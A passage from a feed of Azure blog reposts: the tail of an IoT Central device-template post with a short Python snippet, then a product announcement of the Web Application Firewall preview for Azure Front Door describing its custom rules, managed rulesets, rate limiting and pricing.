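    return {"template": name, "based_on": base,
            "devices": [simulated_device]}

print(create_template("MXChip", "my-devkit"))
```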

We are excited to continue simplifying your device onboarding experience. If there are particular device templates you want to use or if you have any other suggestions, please leave us feedback with the links below.

Next steps

Have ideas or suggestions for new features? Post it on UserVoice.
To explore the full set of features and capabilities and start your free trial, visit the IoT Central website.
Check out our documentation including tutorials to connect your first device.
To give us feedback about your experience with Azure IoT Central, take this survey.
To learn more about the Azure IoT portfolio including the latest news, visit the Microsoft Azure IoT page.

Quelle: Azure

Web application firewall at Azure Front Door service

You have a great web application, and users from all over the world love it. Well, so do malicious attackers. Cyber-attacks grow each year in frequency and sophistication, and being unprotected against them exposes you to the risks of service interruptions, data loss, and tarnished reputation.

We have heard from many of you that security is a top priority when moving web applications onto the cloud. Today, we are very excited to announce our public preview of the Web Application Firewall (WAF) for the Azure Front Door service. By combining our global application and content delivery network with a natively integrated WAF engine, we now offer a highly available platform that helps you deliver your web applications to the world, secure and fast!

WAF with the Front Door service leverages the scale of, and the deep security investments we have made at, the Azure edge, and it is designed to protect you from multiple attack vectors such as injection-type attacks and volumetric DoS attacks. It inspects each incoming request at Azure’s network edge, stops unwanted traffic before it enters your backend servers, and offers protection at scale without sacrificing performance. With WAF for Front Door, you have the option to fine-tune access to your web application using custom rules that you define, as well as to enable a collection of security rules against common web application vulnerabilities packaged as managed rulesets. Furthermore, when you use WAF at Front Door, your security policy management is centralized and any changes you make are instantaneously propagated to all the Front Door edges.

A WAF policy is the building block of WAF and defines the security posture for your web application. It can contain two types of security rules: custom rules and a set of pre-configured rule groups known as a managed ruleset. The Azure-managed Default Rule Set is updated by Azure as needed to adapt to new attack signatures. If you have a cloud-native, Internet-facing web application, such as a web app hosted on the Azure PaaS platform, it is very simple to add Front Door with the default WAF policy. Within just a few clicks, your web application is protected from common OWASP Top 10 exploits, with the latency optimization offered by the Front Door service.

Figure 1 Protecting your Web App with WAF at Front Door

If you are like many of our customers who have compliance and BCDR requirements for your business-critical applications, you probably have your web applications hosted in multiple regions. WAF with Front Door offers centralized policy management and global load balancing supporting many routing options to your backends.

Figure 2 Protecting your multi-region web application with WAF at Front Door

WAF with Front Door can protect backends hosted on Azure as well as those hosted on other clouds or on-premises. You may further lock down your backends to allow only traffic from Front Door and deny direct access from the Internet. WAF at Front Door allows granular access and rate control via custom rules. You may create custom rules along the following dimensions:

IP allow list and block list: control access to your web applications based on a list of client IP addresses or IP address ranges. Both IPv4 and IPv6 are supported.
Geographic-based access control: control access to your web applications based on a client’s country code.
HTTP parameters-based access control: control access to your web applications based on string matching of HTTP(S) request parameters such as the query string, POST args, request URI, request headers, and request body.
Request method-based access control: control access to your web applications based on the HTTP request method, such as GET, PUT, and HEAD.
Size constraint: control access to your web applications based on the lengths of specific parts of a request, such as the query string, URI, or request body.
Rate limiting rules: a rate limiting rule limits abnormally high traffic from any client IP. You may set a threshold on the number of web requests allowed from a client IP during a one-minute period. Rate limiting can be combined with match conditions, for example, to rate limit access to a specific URI path.
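
The rate limiting idea described above can be sketched as a sliding one-minute window of request timestamps per client IP. This is a minimal conceptual sketch only; the actual WAF engine at the Front Door edge is distributed and far more involved, and the class below is not its implementation.

```python
# Minimal sketch of per-client-IP rate limiting over a one-minute
# window, as described above. Illustrative only, not the WAF engine.
from collections import defaultdict, deque

class RateLimiter:
    def __init__(self, threshold, window_seconds=60):
        self.threshold = threshold          # allowed requests per window
        self.window = window_seconds
        self.hits = defaultdict(deque)      # client IP -> timestamps

    def allow(self, client_ip, now):
        """Return True if this request is within the rate limit."""
        q = self.hits[client_ip]
        # Drop timestamps that have aged out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.threshold:
            return False                    # over the limit: block
        q.append(now)
        return True

rl = RateLimiter(threshold=3)
results = [rl.allow("203.0.113.7", t) for t in range(5)]
print(results)  # [True, True, True, False, False]
```

Limits are tracked per client IP, so a burst from one address does not affect others.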

WAF is charged based on the number of WAF policies and rules you create, the types of managed rulesets you choose, and the number of web requests you receive. During public preview, WAF at Front Door is free of charge.

As we continue to enhance the Azure WAF offering, we would love to hear your feedback. You can try the Web Application Firewall with Front Door today using the portal, ARM templates, or PowerShell. For more information, visit the detailed documentation for the Web Application Firewall (WAF) for the Azure Front Door service.
Quelle: Azure